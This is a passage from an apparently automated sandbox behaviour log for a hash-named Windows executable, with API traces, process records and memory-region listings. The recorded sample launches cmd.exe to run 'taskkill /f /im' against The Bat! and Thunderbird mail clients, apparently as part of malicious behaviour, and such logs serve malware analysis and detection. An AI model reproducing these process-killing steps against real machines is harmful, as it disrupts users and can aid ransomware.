lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0223.903] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0223.903] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0223.903] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140)) [0223.903] GetProcessHeap () returned 0x5f0000 [0223.903] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x18) returned 0x5f74a8 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0223.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0223.904] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0223.904] GetProcessHeap () returned 0x5f0000 [0223.904] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f74a8) returned 1 [0223.904] GetProcessHeap () returned 0x5f0000 [0223.904] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa) returned 0x5fb110 [0223.904] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0223.908] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im thebat64.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im thebat64.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im thebat64.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x9c0, dwThreadId=0xbd8)) returned 1 [0223.925] CloseHandle (hObject=0x98) returned 1 [0223.926] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0223.926] GetProcessHeap () returned 0x5f0000 [0223.926] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f9d50) returned 1 [0223.926] GetEnvironmentStringsW () returned 0x5f9d50* [0223.926] GetProcessHeap () returned 0x5f0000 [0223.926] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa76) returned 0x5f7cc0 [0223.926] FreeEnvironmentStringsA (penv="=") returned 1 [0223.926] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0224.620] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0224.620] CloseHandle (hObject=0x9c) returned 1 [0224.620] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0224.620] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0224.621] GetProcessHeap () returned 0x5f0000 [0224.621] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f7cc0) returned 1 [0224.621] GetEnvironmentStringsW () returned 0x5fb160* [0224.621] GetProcessHeap () returned 0x5f0000 [0224.621] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa9c) returned 0x5f7cc0 [0224.621] FreeEnvironmentStringsA (penv="=") returned 1 [0224.621] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0224.621] GetProcessHeap () returned 0x5f0000 [0224.622] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f7cc0) returned 1 [0224.622] GetEnvironmentStringsW () returned 0x5fb160* [0224.622] GetProcessHeap () returned 0x5f0000 [0224.622] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa9c) returned 0x5f7cc0 [0224.622] FreeEnvironmentStringsA (penv="=") returned 1 [0224.622] GetProcessHeap () returned 0x5f0000 [0224.622] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fb110) returned 1 [0224.622] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0224.622] _get_osfhandle (_FileHandle=1) returned 0x13c [0224.622] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0224.622] _get_osfhandle (_FileHandle=1) returned 0x13c [0224.622] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0224.622] _get_osfhandle (_FileHandle=0) returned 0x130 [0224.622] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0224.622] GetConsoleOutputCP () returned 0x1b5 [0224.623] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0224.623] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.623] exit (_Code=128) Thread: id = 393 os_tid = 0xef8 Process: id = "78" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2d426000" os_pid = "0x9c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "77" os_parent_pid = "0xd30" cmd_line = "taskkill /f /im thebat64.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5540 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5541 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5542 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5543 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 5544 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 5545 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 5546 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 5547 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 5548 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 5549 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5550 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 5551 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5552 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5553 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5554 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5555 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5556 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5557 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5558 start_va = 0x4150000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 5559 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5560 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5561 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5562 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5563 start_va = 0x4400000 end_va = 0x45cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 5564 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5565 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5566 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5567 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5568 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5569 start_va = 0x44d0000 end_va = 0x45cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 5570 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5571 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5572 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5573 start_va = 0x4160000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 5574 start_va = 0x41a0000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 5575 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5576 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5577 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5578 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5579 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5580 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5581 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5582 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5583 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5584 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5585 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5586 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5587 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5588 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5589 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5590 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5591 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5592 start_va = 0x45d0000 end_va = 0x473ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 5593 start_va = 0x45d0000 end_va = 0x45f9fff monitored = 0 entry_point = 0x45d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5594 start_va = 0x4730000 end_va = 0x473ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 5595 start_va = 0x4740000 end_va = 0x48c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004740000" filename = "" Region: id = 5596 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5597 start_va = 0x48d0000 end_va = 0x4a50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048d0000" filename = "" Region: id = 5598 start_va = 0x4a60000 end_va = 0x5e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a60000" filename = "" Region: id = 5599 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5600 start_va = 0x4130000 end_va = 0x4130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004130000" filename = "" Region: id = 5601 start_va = 0x4140000 end_va = 0x4144fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 5602 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 5603 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 5604 start_va = 0x5e60000 end_va = 0x6196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5605 start_va = 0x45d0000 end_va = 0x46b9fff monitored = 0 entry_point = 0x460d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5606 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 5607 start_va = 0x45d0000 end_va = 0x46affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5608 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5609 start_va = 0x46b0000 end_va = 0x46b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046b0000" filename = "" Region: id = 5610 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5611 start_va = 0x46c0000 end_va = 0x46c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046c0000" filename = "" Region: id = 5612 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5613 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5614 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5615 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5616 start_va = 0x46d0000 end_va = 0x470ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 5617 start_va = 0x61a0000 end_va = 0x61dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061a0000" filename = "" Region: id = 5618 start_va = 0x61e0000 end_va = 0x621ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061e0000" filename = "" Region: id = 5619 start_va = 0x6220000 end_va = 0x625ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006220000" filename = "" Region: id = 5620 start_va = 0x6260000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 5621 start_va = 0x62a0000 end_va = 0x62dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 5622 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5623 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5625 start_va = 0x4710000 end_va = 0x4715fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004710000" filename = "" Thread: id = 394 os_tid = 0xbd8 Thread: id = 395 os_tid = 0x1104 Thread: id = 396 os_tid = 0x1010 Thread: id = 397 os_tid = 0x5f4 Thread: id = 398 os_tid = 0x13d0 Process: id = "79" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2d3b1000" os_pid = "0x8e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im thunderbird.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5627 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5628 start_va = 